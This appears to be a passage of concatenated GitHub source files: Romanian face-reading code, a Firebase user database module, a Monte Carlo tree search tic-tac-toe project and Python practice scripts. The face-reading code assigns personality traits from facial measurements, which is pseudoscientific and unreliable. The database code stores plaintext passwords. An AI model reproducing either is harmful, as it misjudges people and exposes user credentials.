dicti['under_lip_bottom'].x) ** 2 + (dicti['under_lip_top'].y - dicti['under_lip_bottom'].y) ** 2))\n\n latimea_buzelor = marimea_buzelor_sus + marimea_buzelor_jos\n\n distanta_sprancene = int(dicti['eyebrow_right_inner'].x - dicti['eyebrow_left_inner'].x)\n\n distanta_intre_ochi = int(dicti['eye_right_inner'].x - dicti['eye_left_inner'].x)\n\n distanta_ochi_spranceana = int(dicti['eyebrow_right_inner'].y) - int(dicti['eye_left_inner'].y)\n\n marimea_nas = int(dicti['nose_root_left'].y) - int(dicti['nose_left_alar_out_tip'].y)\n if distanta_intre_pupile > marimea_ochi_latura_a + 100:\n text = text + \"Inseamna ca persoana este neglijenta, indiferenta si da dovada de napasare in modul lor de a se comporta. Sunt lenti in decizii si nu sunt potriviti in activitati care presupun reactii rapide si agerime.\\nAu, in schimb, o capacitate foarte mare de memorare, sunt rezistenti, toleranti si foarte meticulosi in ceea ce fac.\\n\\n\"\n else: text = text + \"Persoana are o opinie ingusta asupra realitatii si foarte putina toleranta fata de semeni. E greu de multumit, devine rareori obraznic si are asteptari mari de la alti oameni si de la situatiile din viata lor.\\nAu, in schimb, capacitatea de a se concentra foartre bine, sunt buni observatori si obtin rezultate remarcabile in analiza si calcule.\\n\\n\"\n\n if marimea_buzelor_jos - marimea_buzelor_sus < 6:\n text = text + \"Persoana da mai multa atentie\\n\\n\"\n else: text = text + \"Persona are nevoie de mai multa atentie.\\n\\n\"\n\n\n if marimea_ochi_latura_b > distanta_ochi_spranceana:\n text = text + \"Persoana este prietenoasa, se implica foarte puternic in relatoole cu persoanale pe care doresc sa le ajute.\\nCu cat sunt mai joase, cu atat sunt mai implicate in aceste relatii.\\n\\n\"\n else: text = text + \"Persoana este foarte pretentioasa, are roleranta ridicata, afiseaza un aer aristocratic, rece si detasat. Se spune ca are eleganta si diplomatia innascute.\\nIsi fac cu greu prieteni apropiati, prefrand sa mentina o anumita distanta fata de oameni.\\n\\n\"\n\n if (distanta_sprancene - 23) == 0:\n text = text + \"Persoana este foarte sensibila de critici, se supara repede si traiesc cu impresia ca cineva le doreste raul.\\nIn general, se vad navoiti sa depuna un efort dublu pentru a obtine acelasi succes precum o persoana care nu are sprancenele unite. De asemenea, sunt introvertiti si timizi.\\n\\n\"\n else:\n if distanta_sprancene - 23 > distanta_intre_ochi:\n text = text + \"Peroana este intelegatoare, rabdatoare si are inima plina de compasiune.\\nSe face cu usurinta iubita si acceptata de cei din jurul ei deoarece are un caracter placut. E generoasa, loiala si un foarte bun prieten.\\n\\n\"\n else:\n text = text + \"Persoana are o putere foarte mare de concentrare, atentie la detalii, precisa si da dovada de acuratete.\\nCel mai bine pentru ea ese sa aiba mai multe independenta la locul de munca sau sa inceapa o afacer pe cont propriu.\\n\\n\"\n\n if int(dicti['pupil_right'].x) < int(dicti['mouth_right'].x + 10):\n text = text + \"Persoana este introvertita, centrata pe ea insasi, su o vointa puternuca si sceptica, nu se imprieteneste usor cu oricine, e practica,\\ncumpatata mental si lupta cu hotarare pentru succes ori pentru a-si atinge scopul. Critica lumea si detesta falsitatea.\\n\\n\"\n else: text = text + \"Persoana este curajoasa, energica, are nevoie sa fie in centrul atentiei si este lipsita de timiditatee. Poate ajunge un om influent sau afacerist de succes.\\nInspira incredere si iubeste sa traiasca viata intens. Rade mult, socializeaza cu placere si se imprietenesc usor.\\n\\n\"\n\n # print(lungimea_gurii)\n # print(marimea_nas*(-3)+40)\n if (marimea_nas*(-3) + 40) > lungimea_gurii:\n text = text + \"Persoana are o parere buna desprea ea insasi si este independenta, este foarte ambitioasa, ii place sa actioneze dupa bunul plac si este un lider bun.\\n\\n\"\n else: text = text + \"Persoana are putin incredere in ea insasi, evita activitatile care presupun pozitii sociale inalte si opteaza pentru cele care presupun munca in echipa.\\n\\n\"\n\n return text\n\n # dicti1 = {\n # 'distanta_intre_pupile' : distanta_intre_pupile,\n # 'aria' : arie,\n # 'marimea_ochi_latura_a' : marimea_ochi_latura_a,\n # 'marimea_ochi_latura_b': marimea_ochi_latura_b,\n # 'lungimea_gurii' : lungimea_gurii,\n # 'lungimea_sprancenelor_stanga': lungimea_sprancenelor_stanga,\n # 'lungimea_sprancenelor_dreapta' : lungimea_sprancenelor_dreapta\n # }\n # return dicti, dicti1"
},
{
"alpha_fraction": 0.6377879977226257,
"alphanum_fraction": 0.6420890688896179,
"avg_line_length": 27.04310417175293,
"blob_id": "7a00714ba70bc873b153bbb31f697065df88fead",
"content_id": "ea1a767a288fa11262a7a27939d4eff3223d4453",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 3255,
"license_type": "no_license",
"max_line_length": 126,
"num_lines": 116,
"path": "/Database/DB_CodeUsers.py",
"repo_name": "HarangusPaul/Bool-s",
"src_encoding": "UTF-8",
"text": "import firebase_admin\nfrom firebase_admin import credentials\nfrom firebase_admin import firestore\n\ncred = credentials.Certificate('D:/Scoala/Bool-s/Database/bools-db-firebase-adminsdk-tsrw7-9299478109.json')\n\nfirebase_admin.initialize_app(cred)\ndb = firestore.client()\n\n\ndef create_Questionnaire(IdUser, Question, Answer):\n doc_ref_User = db.collection(\"Users\").document(IdUser).collection(\"Questionnaire\").document(IdUser)\n\n doc_ref_User.set({\n u'Text': Question,\n u\"Answer\": Answer\n })\n\n\ndef create_UsersPassions(IdUser, IdPassion):\n doc_ref_User = db.collection(\"Users\").document(IdUser).collection(\"UserPassions\").document(IdUser)\n\n doc_ref_User.set({\n # u\"IdUser\": IdUser,\n u\"IdPassion\": IdPassion\n })\n\n\ndef create_FacialRecognition(IdUser, Description, DistanceValue):\n doc_ref_User = db.collection(\"Users\").document(IdUser).collection(\"FacialRecognition\").document(IdUser)\n\n doc_ref_User.set({\n # u\"IdUser\": IdUser,\n u\"Description\": Description,\n u\"FacialValue\": DistanceValue\n })\n\n\ndef create_NewUser(IdUser, Full_Name, Age,Gender,Password, Gmail, IdQuestion, IdAnswer, IdPassion, IdFacePart, DistanceValue):\n doc_ref_User = db.collection(\"Users\").document(IdUser)\n\n doc_ref_User.set({\n # u\"ID\": IdUser,\n u'UserName':IdUser,\n u'Full_Name': Full_Name,\n u'Password': Password,\n u'Gender': Gender,\n u\"Age\": Age,\n u\"Gmail\": Gmail\n })\n\n create_Questionnaire(IdUser, IdQuestion, IdAnswer)\n\n create_UsersPassions(IdUser, IdPassion)\n\n create_FacialRecognition(IdUser, IdFacePart, DistanceValue)\n\n\ndef update(IdUser, Field, Value, SubColection):\n if (SubColection != '\\0'):\n doc_ref_User = db.collection(\"Users\").document(IdUser).collection(SubColection).document(IdUser)\n\n doc_ref_User.update({\n Field: Value\n })\n else:\n doc_ref_User = db.collection(\"Users\").document(IdUser)\n doc_ref_User.update({\n Field: Value\n })\n\ndef database_GetPassword(UserName):\n emp_ref = db.collection('Users')\n docs = emp_ref.stream()\n\n for doc in docs:\n user = doc.to_dict()\n username = str(user.get('UserName'))\n if username == UserName:\n password = user.get('Password')\n return password\n\ndef validate_existence(UserName):\n emp_ref = db.collection('Users')\n docs = emp_ref.stream()\n\n for doc in docs:\n user = doc.to_dict()\n username = str(user.get('UserName'))\n if username == str(UserName):\n return 1\n return 0\n\ndef send_Text_Answer(IdUser,Text):\n doc_ref_User = db.collection(\"Users\").document(IdUser).collection(\"Questionnaire\").document(IdUser)\n\n doc_ref_User.update({\n \"IdAnswer\": Text\n })\n\ndef send_Facial_Answer(IdUser,Text):\n doc_ref_User = db.collection(\"Users\").document(IdUser).collection(\"FacialRecognition\").document(IdUser)\n\n doc_ref_User.update({\n \"FacialValue\": Text\n })\n\ndef database(Username):\n emp_ref = db.collection('Users')\n docs = emp_ref.stream()\n\n for doc in docs:\n user = doc.to_dict()\n username = str(user.get('UserName'))\n if username == Username:\n return user\n\n\n"
},
{
"alpha_fraction": 0.8260869383811951,
"alphanum_fraction": 0.8260869383811951,
"avg_line_length": 14.666666984558105,
"blob_id": "0cbdeb94d814f443e76c7ecd51a0dfc8f0bdb5b5",
"content_id": "dc575f8ff54dc4f696c52cb8aa8c32f23a8fa0a9",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 46,
"license_type": "no_license",
"max_line_length": 37,
"num_lines": 3,
"path": "/Aplication Name.py",
"repo_name": "HarangusPaul/Bool-s",
"src_encoding": "UTF-8",
"text": "from Interfata.LogInCode import start\n\nstart()"
}
] | 7 |
Ganariya/MonteCarloTreeSearch | https://github.com/Ganariya/MonteCarloTreeSearch | 1b07ebaf71968f33b9160e12d5b358e44e66abbf | af8216429217e4bb84203e7adf3d2c717f31dac3 | c6ac41b1fb3d1e6e22790430ad529b5a4b8069fd | refs/heads/main | 2023-05-09T10:58:27.683709 | 2021-05-16T03:28:28 | 2021-05-16T03:28:28 | 367,775,797 | 0 | 0 | null | null | null | null | null | [
{
"alpha_fraction": 0.5487571954727173,
"alphanum_fraction": 0.5587953925132751,
"avg_line_length": 31.6875,
"blob_id": "45e506599aec1a9c80ced6e43a9efcf632a6d1a0",
"content_id": "a0a08a40239c749c38a1333d5a8a60bc54e68afb",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 2320,
"license_type": "no_license",
"max_line_length": 114,
"num_lines": 64,
"path": "/monte_carlo_tree_search/node.py",
"repo_name": "Ganariya/MonteCarloTreeSearch",
"src_encoding": "UTF-8",
"text": "from __future__ import annotations\nfrom typing import List, Optional\nfrom monte_carlo_tree_search.istate import IState\nfrom monte_carlo_tree_search.util.ucb1 import ucb1\nfrom monte_carlo_tree_search.util.argmax import argmax\n\n\nclass Node:\n def __init__(self, state: IState, expand_base: int = 10) -> None:\n self.state: IState = state\n self.w: int = 0 # 報酬\n self.n: int = 0 # 訪問回数\n self.expand_base: int = expand_base\n self.children: Optional[List[Node]] = None\n\n def evaluate(self) -> float:\n \"\"\"self (current Node) の評価値を計算して更新する.\"\"\"\n if self.state.is_done():\n value = -1 if self.state.is_lose() else 0\n self.w += value\n self.n += 1\n return value\n\n # self (current Node) に子ノードがない場合\n if not self.children:\n # ランダムにプレイする\n v = Node.playout(self.state)\n self.w += v\n self.n += 1\n # 十分に self (current Node) がプレイされたら展開(1ノード掘り進める)する\n if self.n == self.expand_base:\n self.expand()\n return v\n else:\n v = -self.next_child_based_ucb().evaluate()\n self.w += v\n self.n += 1\n return v\n\n def expand(self) -> None:\n \"\"\"self (current Node) を展開する.\"\"\"\n self.children = [Node(self.state.next(action), self.expand_base) for action in self.state.legal_actions()]\n\n def next_child_based_ucb(self) -> Node:\n \"\"\"self (current Node) の子ノードから1ノード選択する.\"\"\"\n\n # 試行回数が0のノードを優先的に選ぶ\n for child in self.children:\n if child.n == 0:\n return child\n\n # UCB1\n sn = sum([child.n for child in self.children])\n ucb1_values = [ucb1(sn, child.n, child.w) for child in self.children]\n return self.children[argmax(ucb1_values)]\n\n @classmethod\n def playout(cls, state: IState) -> float:\n \"\"\"決着がつくまでランダムにプレイする.\"\"\"\n if state.is_lose():\n return -1\n if state.is_draw():\n return 0\n return -Node.playout(state.next(state.random_action()))\n"
},
{
"alpha_fraction": 0.7368420958518982,
"alphanum_fraction": 0.7368420958518982,
"avg_line_length": 37,
"blob_id": "f0e7d340a8faa2e81c8b6f2de3f37ac62541a90a",
"content_id": "7aa63f30d7a406051b2f4b8323b2a103b3f486c9",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 76,
"license_type": "no_license",
"max_line_length": 44,
"num_lines": 2,
"path": "/monte_carlo_tree_search/util/argmax.py",
"repo_name": "Ganariya/MonteCarloTreeSearch",
"src_encoding": "UTF-8",
"text": "def argmax(collection) -> int:\n return collection.index(max(collection))\n"
},
{
"alpha_fraction": 0.6697247624397278,
"alphanum_fraction": 0.6697247624397278,
"avg_line_length": 31.058822631835938,
"blob_id": "1876f190c50c57325c4f455f0f1dc03abd164ca5",
"content_id": "ce000cc0c59a02d0d1c0bc53089e9583fab4c71c",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 545,
"license_type": "no_license",
"max_line_length": 62,
"num_lines": 17,
"path": "/monte_carlo_tree_search/monte_carlo_tree_search.py",
"repo_name": "Ganariya/MonteCarloTreeSearch",
"src_encoding": "UTF-8",
"text": "from monte_carlo_tree_search.node import Node\nfrom monte_carlo_tree_search.util.argmax import argmax\n\n\nclass MonteCarloTreeSearch:\n\n @classmethod\n def train(cls, root_node: Node, simulation: int) -> None:\n root_node.expand()\n for _ in range(simulation):\n root_node.evaluate()\n\n @classmethod\n def select_action(cls, root_node: Node) -> int:\n legal_actions = root_node.state.legal_actions()\n visit_list = [child.n for child in root_node.children]\n return legal_actions[argmax(visit_list)]\n"
},
{
"alpha_fraction": 0.48808127641677856,
"alphanum_fraction": 0.49824151396751404,
"avg_line_length": 33.119998931884766,
"blob_id": "2fe7a236829b03131a231b95a9b6e4dd7031c200",
"content_id": "59d644f4f2be17f07395cd4396105a8c3796ee0b",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 2559,
"license_type": "no_license",
"max_line_length": 117,
"num_lines": 75,
"path": "/tic_tac_toe/state.py",
"repo_name": "Ganariya/MonteCarloTreeSearch",
"src_encoding": "UTF-8",
"text": "from __future__ import annotations\nfrom random import choice\nfrom monte_carlo_tree_search.istate import IState\nfrom typing import List, Optional, Final\n\nLENGTH: Final[int] = 3\nHEIGHT: Final[int] = 3\nWIDTH: Final[int] = 3\n\n\nclass State(IState):\n def __init__(self, pieces: Optional[List[int]] = None, enemy_pieces: Optional[List[int]] = None):\n self.pieces: Optional[List[int]] = pieces if pieces is not None else [0] * (HEIGHT * WIDTH)\n self.enemy_pieces: Optional[List[int]] = enemy_pieces if enemy_pieces is not None else [0] * (HEIGHT * WIDTH)\n\n def next(self, action: int) -> State:\n pieces = self.pieces.copy()\n pieces[action] = 1\n return State(self.enemy_pieces, pieces)\n\n def legal_actions(self) -> List[int]:\n return [i for i in range(HEIGHT * WIDTH) if self.pieces[i] == 0 and self.enemy_pieces[i] == 0]\n\n def random_action(self) -> int:\n return choice(self.legal_actions())\n\n @staticmethod\n def pieces_count(pieces: List[int]) -> int:\n return pieces.count(1)\n\n def is_lose(self) -> bool:\n dy = [0, 1, 1, -1]\n dx = [1, 0, 1, -1]\n\n for y in range(HEIGHT):\n for x in range(WIDTH):\n for k in range(4):\n lose = True\n ny, nx = y, x\n for i in range(LENGTH):\n if ny < 0 or ny >= HEIGHT or nx < 0 or nx >= WIDTH:\n lose = False\n break\n if self.enemy_pieces[ny * WIDTH + nx] == 0:\n lose = False\n break\n ny += dy[k]\n nx += dx[k]\n if lose:\n return True\n\n return False\n\n def is_draw(self) -> bool:\n return self.pieces_count(self.pieces) + self.pieces_count(self.enemy_pieces) == HEIGHT * WIDTH\n\n def is_done(self) -> bool:\n return self.is_lose() or self.is_draw()\n\n def is_first_player(self) -> bool:\n return self.pieces_count(self.pieces) == self.pieces_count(self.enemy_pieces)\n\n def __str__(self) -> str:\n ox = ('o', 'x') if self.is_first_player() else ('x', 'o')\n ret = \"\"\n for i in range(HEIGHT * WIDTH):\n if self.pieces[i] == 1:\n ret += ox[0]\n elif self.enemy_pieces[i] == 1:\n ret += ox[1]\n else:\n ret += '-'\n if i % WIDTH == WIDTH - 1:\n ret += '\\n'\n return ret\n"
},
{
"alpha_fraction": 0.7653061151504517,
"alphanum_fraction": 0.7908163070678711,
"avg_line_length": 18.399999618530273,
"blob_id": "06f2e52ff774570a1d7b7abf48fbe03e5e207b61",
"content_id": "b230ea6aa2320ac91bdfad76af3841290db58a1a",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 374,
"license_type": "no_license",
"max_line_length": 87,
"num_lines": 10,
"path": "/README.md",
"repo_name": "Ganariya/MonteCarloTreeSearch",
"src_encoding": "UTF-8",
"text": "\n# MonteCarloTreeSearch\n\n[AlphaZero 深層学習・強化学習・探索 人工知能プログラミング実践入門](https://www.borndigital.co.jp/book/14383.html)\n\n以上の本を参考に、モンテカルロ木探索をセルフ実装しています。\nいくつか異なる点があります。\n\n- 冗長なコードを改善\n- typing による型付け\n- 抽象化\n\n"
},
{
"alpha_fraction": 0.4909090995788574,
"alphanum_fraction": 0.5272727012634277,
"avg_line_length": 21,
"blob_id": "b36661d73d5a36c1125721c4bfd967646177e7a4",
"content_id": "77d1b176f928834c6b52071cc11c76617cf77e55",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 110,
"license_type": "no_license",
"max_line_length": 49,
"num_lines": 5,
"path": "/monte_carlo_tree_search/util/ucb1.py",
"repo_name": "Ganariya/MonteCarloTreeSearch",
"src_encoding": "UTF-8",
"text": "import math\n\n\ndef ucb1(sn: int, n: int, w: float) -> float:\n return -w / n + (2 * math.log(sn) / n) ** 0.5\n"
},
{
"alpha_fraction": 0.5661016702651978,
"alphanum_fraction": 0.5805084705352783,
"avg_line_length": 25.22222137451172,
"blob_id": "7bd275643f3e2106be025d7b73924ace7e73e6ce",
"content_id": "11fa9c12d53674c3b2363d632ec72887d7df2e67",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1232,
"license_type": "no_license",
"max_line_length": 80,
"num_lines": 45,
"path": "/tic_tac_toe/play_tic_tac_toe.py",
"repo_name": "Ganariya/MonteCarloTreeSearch",
"src_encoding": "UTF-8",
"text": "from tic_tac_toe.state import State\nfrom monte_carlo_tree_search.node import Node\nfrom monte_carlo_tree_search.monte_carlo_tree_search import MonteCarloTreeSearch\n\n\nGAMES = 100\n\n\ndef first_player_point(ended_state: State) -> float:\n # 1:先手勝利, 0:先手敗北, 0.5:引き分け\n if ended_state.is_lose():\n return 0 if ended_state.is_first_player() else 1\n return 0.5\n\n\npoint = 0\n\nfor _ in range(GAMES):\n state = State()\n while True:\n if state.is_done():\n if state.is_draw():\n print(\"引き分け\")\n elif state.is_first_player() and state.is_lose():\n print(\"先手 (o) の負け \")\n else:\n print(\"後手 (x) の負け \")\n break\n\n if state.is_first_player():\n root_node: Node = Node(state, expand_base=10)\n MonteCarloTreeSearch.train(root_node=root_node, simulation=100)\n action = MonteCarloTreeSearch.select_action(root_node)\n state = state.next(action)\n else:\n action = state.random_action()\n state = state.next(action)\n\n print(state)\n print()\n\n point += first_player_point(state)\n\n\nprint(f\"VS Random {point}\")\n"
},
{
"alpha_fraction": 0.6029654145240784,
"alphanum_fraction": 0.6029654145240784,
"avg_line_length": 17.363636016845703,
"blob_id": "5e01801cc87e2ffd683ded0104379b1ea305fa8b",
"content_id": "3c45c476f5edb8616f83270f194796e46db6c259",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 607,
"license_type": "no_license",
"max_line_length": 42,
"num_lines": 33,
"path": "/monte_carlo_tree_search/istate.py",
"repo_name": "Ganariya/MonteCarloTreeSearch",
"src_encoding": "UTF-8",
"text": "from __future__ import annotations\nfrom abc import ABC, abstractmethod\nfrom typing import List\n\n\nclass IState(ABC):\n @abstractmethod\n def legal_actions(self) -> List[int]:\n pass\n\n @abstractmethod\n def random_action(self) -> int:\n pass\n\n @abstractmethod\n def next(self, action: int) -> IState:\n pass\n\n @abstractmethod\n def is_lose(self) -> bool:\n pass\n\n @abstractmethod\n def is_draw(self) -> bool:\n pass\n\n @abstractmethod\n def is_done(self) -> bool:\n pass\n\n @abstractmethod\n def is_first_player(self) -> bool:\n pass\n\n"
}
] | 8 |
SWI-MIN/Python_practice | https://github.com/SWI-MIN/Python_practice | fd6524e0a6eb1c841145a81dc822f87026730f82 | 4da31be21823e9d6e392e823bd0fc38b9713b517 | 46d6bc28b43c3761009fe0c29c3309931ca26496 | refs/heads/master | 2022-12-19T14:01:52.564019 | 2020-09-29T14:24:03 | 2020-09-29T14:24:03 | 286,469,717 | 0 | 0 | null | null | null | null | null | [
{
"alpha_fraction": 0.5435114502906799,
"alphanum_fraction": 0.6068702340126038,
"avg_line_length": 33.47368240356445,
"blob_id": "b69363b0db33792749a9d5f10be1b64ace9084b7",
"content_id": "16312e9b3057e39fec816f64538859f70da6f608",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1326,
"license_type": "no_license",
"max_line_length": 146,
"num_lines": 38,
"path": "/自學聖經/user介面.py",
"repo_name": "SWI-MIN/Python_practice",
"src_encoding": "UTF-8",
"text": "import tkinter as tk\ndef kwhp():\n if(kwhpin.get() != 0):\n kwtohp = kwhpin.get() * 1.34102209\n kwtohpans.set(str(kwhpin.get()) + ' kw = ' + str(round(kwtohp,2)) + ' hp')\n else:\n pass\n if(hpkwin.get() != 0):\n hptokw = hpkwin.get() * 0.745699872\n hptokwans.set(str(hpkwin.get()) + ' hp = ' + str(round(hptokw,2)) + ' kw')\n else:\n pass\n\nswim = tk.Tk()\nkwhpin = tk.DoubleVar()\nkwtohpans = tk.DoubleVar()\nhpkwin = tk.DoubleVar()\nhptokwans = tk.DoubleVar()\n\nswim.geometry('720x480')\nswim.title('KW to HP & HP to KW')\n# while(True):\ntext1 = tk.Label(swim, text = 'KW to HP', padx = 30, pady = 10, font = 30)#, width =30, height = 10, bg = 'grey', fg = 'black', font = ('標楷體',12))\ntext1.pack()\nentry1 = tk.Entry(swim, textvariable = kwhpin, font = 30)\nentry1.pack()\nans1 = tk.Label(swim, textvariable = kwtohpans, font = 30)\nans1.pack(pady = 10)\ntext2 = tk.Label(swim, text = 'HP to KW', padx = 30, pady = 10, font = 30)#, width =30, height = 10, bg = 'grey', fg = 'black', font = ('標楷體',12))\ntext2.pack()\nentry2 = tk.Entry(swim, textvariable = hpkwin, font = 30)\nentry2.pack()\nans2 = tk.Label(swim, textvariable = hptokwans, font = 30)\nans2.pack(pady = 10)\nbutton1 = tk.Button(swim, text = '確認', command = kwhp, font = 30)\nbutton1.pack(pady = 10)\n\nswim.mainloop()\n"
},
{
"alpha_fraction": 0.3976455330848694,
"alphanum_fraction": 0.5323740839958191,
"avg_line_length": 23.532258987426758,
"blob_id": "c9ee3dc00baf21a2676323a9a2b8cb03e0727f28",
"content_id": "0a135a47b3dc5daf79f1375e5ba8c5c8d4dc4444",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1875,
"license_type": "no_license",
"max_line_length": 60,
"num_lines": 62,
"path": "/自學聖經/03_迴圈、串列與元組.py",
"repo_name": "SWI-MIN/Python_practice",
"src_encoding": "UTF-8",
"text": "# coding=UTF-8\n#---------- list ----------\nlist1 = [1,2,3,4,5,6]\nprint(list1[-1]) # 串列取值可以為負值(-1取出最後一個(5))\n\n# append (附加),extend(延伸),insert(插入),pop(拋出)\n# append 可以是元素也可以是串列,append 會將串列當成一個元素加入list\nlist2 = [1,2,3,4,5,6]\nlist1.append(7) #list2 = [1,2,3,4,5,6,7]\nlist1.append([8,9]) #list2 = [1,2,3,4,5,6,7,[8,9]]\n# extend 只能是串列\nlist3 = [1,2,3,4,5,6]\nlist3.extend([8,9]) #list3 = [1,2,3,4,5,6,8,9]\n# insert 指定串列新增位置,索引超過串列大小放最後\nlist4 = [1,2,3,4,5,6]\nlist4.insert(1,55) # [1, 55, 2, 3, 4, 5, 6]\n[1, [10, 11], 55, 2, 3, 4, 5, 6]\nlist4.insert(1,[10,11]) # [1, [10, 11], 55, 2, 3, 4, 5, 6]\n# pop 無參數,取出最後一個。有參數,取出指定元素\nlist5 = [1,2,3,4,5,6]\nlist5.pop() # [1, 2, 3, 4, 5]\nlist5.pop(1) # [1, 3, 4, 5]\n\n#---------- tuple函式 ----------\n# tuple元組,結構與list相同,但其不能修改(不能修改的list)\n# 優點 : 比list快。 資料較為安全(不能更改)\n\n# list 與 tuple 轉換\ntuple11 = (1,2,3,4,5,6)\nlist11 = list(tuple11)\n\nlist12 = [1,2,3,4,5,6]\ntuple12 = tuple(list12)\n\n\n#---------- range函式 ----------\nra = range(5) # 0~4\nprint(list(ra))\n# 變數 = range(起始值, 終止值)\nrb = range(3,8) \nprint(list(rb)) # 3~7 包含頭不含尾\n# 變數 = range(起始值, 終止值, 間隔值) 間隔值可為負\nrb1 = range(3,8,2)\nprint(list(rb1)) # [3, 5, 7]\nrb2 = range(8,3,-2)\nprint(list(rb2)) # [8, 6, 4]\n\n# python 的for 更像是foreach\nfor i in range(1,10):\n for j in range(1,10):\n ans = i * j\n print('%2dx%2d = %-2d '%(i, j, ans), end='')\n print()\nwh1 = 1\nwhile(wh1 < 10):\n wh2 = 1\n while(wh2 < 10):\n whans = wh1 * wh2\n print('%2dx%2d = %-2d '%(wh1, wh2, whans), end='')\n wh2+=1\n print() \n wh1+=1\n\n\n\n\n\n\n\n\n"
},
{
"alpha_fraction": 0.6428571343421936,
"alphanum_fraction": 0.704081654548645,
"avg_line_length": 13.142857551574707,
"blob_id": "3f9182f6d7ba0f3175889c22230b14815474a50d",
"content_id": "1e8c747eb6bc62aeb61fdf5c01b73fe6ddc06478",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 98,
"license_type": "no_license",
"max_line_length": 24,
"num_lines": 7,
"path": "/自學聖經/09_使用者介面.py",
"repo_name": "SWI-MIN/Python_practice",
"src_encoding": "UTF-8",
"text": "import tkinter as tk\n\nswim = tk.Tk()\n\nswim.geometry('720*240')\nswim.title('TITLE')\nswim.mainloop()"
},
{
"alpha_fraction": 0.3421263098716736,
"alphanum_fraction": 0.36690646409988403,
"avg_line_length": 16.885713577270508,
"blob_id": "0f67c158dee11e62e3b2b2793e9ad1ff2a260b50",
"content_id": "8c5bd98b537da70c1fc8caf2bb78090ea6e27126",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1737,
"license_type": "no_license",
"max_line_length": 49,
"num_lines": 70,
"path": "/02.運算.py",
"repo_name": "SWI-MIN/Python_practice",
"src_encoding": "UTF-8",
"text": "###########算數運算############\n# + 加\n# - 減\n# * 乘\n# / 小數除法\n# % 取餘數除法\n# ** 次方運算\n# // 整數除法\n\nx=3//2 # 整數除法\nprint(x)\nx=3+2 # 加\nprint(x)\nx=3-2 # 減\nprint(x)\nx=3*2 # 乘\nprint(x)\nx=3/2 # 小數除法\nprint(x)\nx=3%2 # 取餘數除法\nprint(x)\nx=3**2 # 次方運算\nprint(x)\nx=3**0.5 # 開根號運算\nprint(x)\nx=3//2 # 整數除法\nprint(x)\n###########賦值運算############\n# =\t 简单賦值運算 c = a + b 将 a + b 的运算结果赋值为 c\n# +=\t 加法賦值運算\tc += a 等效于 c = c + a\n# -=\t 减法賦值運算\tc -= a 等效于 c = c - a\n# *=\t 乘法賦值運算\tc *= a 等效于 c = c * a\n# /=\t 除法賦值運算\tc /= a 等效于 c = c / a\n# %=\t 取模賦值運算 c %= a 等效于 c = c % a\n# **=\t幂賦值運算 \tc **= a 等效于 c = c ** a\n# //=\t取整除賦值運算 c //= a 等效于 c = c // a\n\n###########比較運算############\n# == 等於\n# != 不等於\n# > 大於\n# < 小於\n# >= 大於等於\n# <= 小於等於\n\n\n\n\n#############以下是字串################\n\ns='WAKAKA\\'LALA\\'WAWAWA'\nprint(s)\n# 3個單or雙引號可以直接換行\ns=\"\"\"WAKAKA\\'LA\n \n \n \n 爽啦~~就愛空這麼多行,你打我撒\n \n \n \n LA\\'WAWAWA\"\"\"\nprint(s)\ns='你打我撒~'*3 + '不打臉行不'\nprint(s)\nprint(s[1]) # 第幾個字\nprint(s[4]) # 第幾個字\nprint(s[15:19]) # 第幾個字開始第幾個字結束,包含開頭不包含結尾\nprint(s[15:]) # 只給開頭,不給結尾\nprint(s[:15]) # 只給結尾,不給開頭"
},
{
"alpha_fraction": 0.48566877841949463,
"alphanum_fraction": 0.5493630766868591,
"avg_line_length": 22.296297073364258,
"blob_id": "8e3cf66390b28bf4da12156157d2a377e12154e0",
"content_id": "8b3a021400cfd7e9abd8e2b0b9c68596e65e1d6e",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 834,
"license_type": "no_license",
"max_line_length": 65,
"num_lines": 27,
"path": "/03.List-Tuple.py",
"repo_name": "SWI-MIN/Python_practice",
"src_encoding": "UTF-8",
"text": "# List 有順序、可動列表\nnumlist=[3,4,5,6,7]\nprint(numlist) \nprint(numlist[1]) # 取表中第一個資料\nnumlist[1]=44444444 # 更新表資料\nprint(numlist)\nprint(numlist[1:4]) # 取表中第1個到第4個資料,包含頭不包含尾\nnumlist[1:4]=[] # 刪除中第1個到第4個資料,包含頭不包含尾\nprint(numlist) \nnumlist=numlist+[8,9] # 列表串接\nprint(numlist) \nnumlist+=[8,9] # 列表串接\nprint(numlist) \n\nlength=len(numlist)\nprint(length) # 取得列表長度 做法1\nprint(len(numlist)) # 取得列表長度 做法2\n\n# 二維\nnumlist=[[0,1,2],[0,1,2]]\n\n#################################################################\n\n# Tuple 有順序、不可動列表\nnumtuple=(3,4,5,6,7)\n\n# list 跟 tuple 的差別只在於tuple不可變動"
},
{
"alpha_fraction": 0.4689054787158966,
"alphanum_fraction": 0.5111940503120422,
"avg_line_length": 20.105262756347656,
"blob_id": "60436c60cab52f07dcf0d55e33a3159180b8396c",
"content_id": "c0d33e1adabf960db32c962c3f77ebc290e86f75",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1002,
"license_type": "no_license",
"max_line_length": 59,
"num_lines": 38,
"path": "/04.Set-Dictionary.py",
"repo_name": "SWI-MIN/Python_practice",
"src_encoding": "UTF-8",
